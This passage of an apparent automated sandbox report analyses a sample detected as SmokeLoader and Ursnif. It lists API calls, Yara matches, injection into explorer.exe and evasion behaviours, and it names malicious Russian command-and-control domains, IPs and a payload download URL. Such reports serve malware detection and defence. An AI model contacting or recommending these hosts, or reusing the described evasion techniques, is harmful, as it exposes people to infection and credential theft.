Source: explorer.exe, 00000001.00000000.333855555.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.400604224.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.376202069.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: EProgram Managerzx
Source: explorer.exe, 00000001.00000000.413325758.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.406921361.0000000005C70000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.385911308.000000000834F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.333855555.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.400604224.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.376202069.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.399977921.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.375933327.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.333600571.00000000009C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progmanath
Source: explorer.exe, 00000001.00000000.333855555.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.400604224.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.376202069.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\3196.exe Queries volume information: C:\Users\user\AppData\Local\Temp\3196.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Code function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 6_2_00401493
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Code function: 6_2_004354EC cpuid 6_2_004354EC
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Code function: 6_2_00401A49 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 6_2_00401A49
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Code function: 6_2_004012B0 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 6_2_004012B0
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Code function: 6_2_004354EC RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 6_2_004354EC

Stealing of Sensitive Information
barindex
Yara detected Ursnif
Source: Yara match File source: 6.2.loader_250246_15072022_2203_31102022.exe.d394a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.loader_250246_15072022_2203_31102022.exe.430000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.586624507.0000000000D39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match File source: 4.2.vcivdjd.4d0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.cqu7x.exe.520000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vcivdjd.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.vcivdjd.4e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.cqu7x.exe.510e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.cqu7x.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.415776182.0000000002381000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.415123167.0000000000520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.459393089.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.471472153.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.471974631.0000000000911000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.401881839.0000000002B21000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.322194744.0000000000520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected Ursnif
Source: Yara match File source: 6.2.loader_250246_15072022_2203_31102022.exe.d394a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.loader_250246_15072022_2203_31102022.exe.430000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.586624507.0000000000D39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match File source: 4.2.vcivdjd.4d0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.cqu7x.exe.520000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vcivdjd.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.vcivdjd.4e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.cqu7x.exe.510e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.cqu7x.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.415776182.0000000002381000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.415123167.0000000000520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.459393089.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.471472153.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.471974631.0000000000911000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.401881839.0000000002B21000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.322194744.0000000000520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 743908 Sample: cqu7x.exe Startdate: 11/11/2022 Architecture: WINDOWS Score: 100 40 Snort IDS alert for network traffic 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus detection for URL or domain 2->44 46 5 other signatures 2->46 8 cqu7x.exe 2->8         started        11 vcivdjd 2->11         started        process3 signatures4 60 Detected unpacking (changes PE section rights) 8->60 62 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 8->62 64 Maps a DLL or memory area into another process 8->64 72 2 other signatures 8->72 13 explorer.exe 4 8->13 injected 66 Antivirus detection for dropped file 11->66 68 Multi AV Scanner detection for dropped file 11->68 70 Machine Learning detection for dropped file 11->70 process5 dnsIp6 36 kukaryka.ru 80.76.42.141, 49696, 80 HostingvpsvilleruRU Russian Federation 13->36 38 dindunketagestan.ru 37.140.192.158, 49695, 80 AS-REGRU Russian Federation 13->38 28 C:\Users\user\AppData\Roaming\vcivdjd, PE32 13->28 dropped 30 C:\Users\user\AppData\Local\Temp\3196.exe, PE32 13->30 dropped 32 C:\Users\user\...\vcivdjd:Zone.Identifier, ASCII 13->32 dropped 74 System process connects to network (likely due to code injection or exploit) 13->74 76 Benign windows process drops PE files 13->76 78 Deletes itself after installation 13->78 80 Hides that the sample has been downloaded from the Internet (zone.identifier) 13->80 18 3196.exe 3 13->18         started        file7 signatures8 process9 file10 26 loader_250246_15072022_2203_31102022.exe, PE32 18->26 dropped 48 Multi AV Scanner detection for dropped file 18->48 50 Machine Learning detection for dropped file 18->50 22 loader_250246_15072022_2203_31102022.exe 6 18->22         started        signatures11 process12 dnsIp13 34 telemetry.skype.com 22->34 52 Antivirus detection for dropped file 22->52 54 Multi AV Scanner detection for dropped file 22->54 56 Found evasive API chain (may stop execution after checking system information) 22->56 58 4 other signatures 22->58 signatures14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
80.76.42.141
 kukaryka.ru Russian Federation
59504 HostingvpsvilleruRU true
37.140.192.158
 dindunketagestan.ru Russian Federation
197695 AS-REGRU true

Contacted Domains

Name IP Active
kukaryka.ru 80.76.42.141 true
dindunketagestan.ru 37.140.192.158 true
telemetry.skype.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://dindunketagestan.ru/ true
  • Avira URL Cloud: malware
 unknown
http://goalichkindomik.ru/ true
  • Avira URL Cloud: malware
 unknown
http://kukaryka.ru/iTunesHelper.exe false
  • Avira URL Cloud: safe
 unknown
http://pali44unkis9.ru/ true
  • Avira URL Cloud: malware
 unknown
http://klenoviycdesss.ru/ true
  • Avira URL Cloud: malware
 unknown